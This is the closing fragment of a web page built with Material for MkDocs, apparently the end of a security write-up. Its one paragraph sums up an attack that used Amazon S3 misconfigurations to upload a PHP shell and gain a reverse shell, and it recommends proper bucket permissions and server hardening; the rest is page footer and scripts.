<p>This attack leveraged <strong>Amazon S3 misconfigurations</strong> to upload a <strong>remote PHP shell</strong>, which was used to execute commands and gain a <strong>reverse shell</strong>. Proper <strong>S3 bucket permissions</strong> and <strong>server hardening</strong> can prevent such exploits.</p>












                
              </article>
            </div>
          
          
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
        </div>
        
      </main>
      
        <footer class="md-footer">
  
  <div class="md-footer-meta md-typeset">
    <div class="md-footer-meta__inner md-grid">
      <div class="md-copyright">
  
  
    Made with
    <a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
      Material for MkDocs
    </a>
  
</div>
      
    </div>
  </div>
</footer>
      
    </div>
    <div class="md-dialog" data-md-component="dialog">
      <div class="md-dialog__inner md-typeset"></div>
    </div>
    
    
    <script id="__config" type="application/json">{"base": "..", "features": [], "search": "../assets/javascripts/workers/search.f8cc74c7.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
    
    
      <script src="../assets/javascripts/bundle.f1b6f286.min.js"></script>
      
    
  </body>
</html>